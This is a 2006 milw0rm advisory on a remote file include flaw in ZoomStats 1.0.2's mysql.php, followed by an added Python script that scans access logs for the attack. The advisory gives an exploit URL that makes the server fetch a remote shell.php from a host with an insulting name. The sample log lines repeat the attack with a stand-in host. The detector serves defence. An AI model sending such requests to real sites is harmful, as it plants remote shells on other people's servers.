Computer Security
From: MILW0RM <submit_(at)_milw0rm.com>
Date: 25.09.2006
Subject: ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability

###### ToXiC #########################
#
#BuG FounD  by Drago84
#
#Application Affect:ZoomStats
#Source Code:
#http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=kent

#Problem:
#$GLOBALS['lib']['db']['path'] array not declared
#Solution : $GLOBALS['lib']['db']['path']
#Page Vulnerable : mysql.php
#Dir Page: /libs/dbmax/
# Example Of ExPloit is:
#http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke
# ToXic Security
###### ToXiC ###Drago84###############

# milw0rm.com [2006-09-24]
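
Added example, not part of the original advisory or of ZoomStats: a log check for the request pattern shown above, where a query parameter named GLOBALS[...] carries a remote URL, including percent-encoded and double-encoded forms. The log lines, hosts and the names `scan` and `decode` are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter name that addresses PHP's $GLOBALS array, as in the advisory's URL.
GLOBALS_RE = re.compile(r"^GLOBALS\[")
# Parameter value that points at a remote resource.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)

# Constructed sample lines (documentation addresses and hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2006:10:00:01 +0000] "GET /zoomstats/index.php?page=stats HTTP/1.1" 200 5120',
    "192.0.2.44 - - [25/Sep/2006:10:02:13 +0000] \"GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://remote.example/inc.txt? HTTP/1.1\" 200 312",
    '192.0.2.44 - - [25/Sep/2006:10:02:20 +0000] "GET /zoomstats/libs/dbmax/mysql.php?GLOBALS%5Blib%5D%5Bdb%5D%5Bpath%5D=http%3A%2F%2Fremote.example%2Finc.txt%3F HTTP/1.1" 200 312',
    '192.0.2.10 - - [25/Sep/2006:10:03:00 +0000] "GET /zoomstats/index.php?ref=http://www.example.org/ HTTP/1.1" 200 5120',
    '192.0.2.51 - - [25/Sep/2006:10:04:41 +0000] "GET /zoomstats/libs/dbmax/mysql.php?GLOBALS%255Bx%255D=1 HTTP/1.1" 200 98',
]

def decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded names and values are normalised."""
    for _ in range(rounds):
        nxt = unquote(text)
        if nxt == text:
            break
        text = nxt
    return text

def scan(lines):
    """Return (line_number, path, parameter_name, kind) for each GLOBALS[...] parameter."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            name, value = decode(name), decode(value)
            if GLOBALS_RE.match(name):
                kind = "remote-include" if REMOTE_RE.match(value) else "globals-overwrite"
                findings.append((number, decode(path), name, kind))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A request that sets any GLOBALS[...] parameter is reported even when the value is not a URL, since no legitimate client sends that parameter name.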
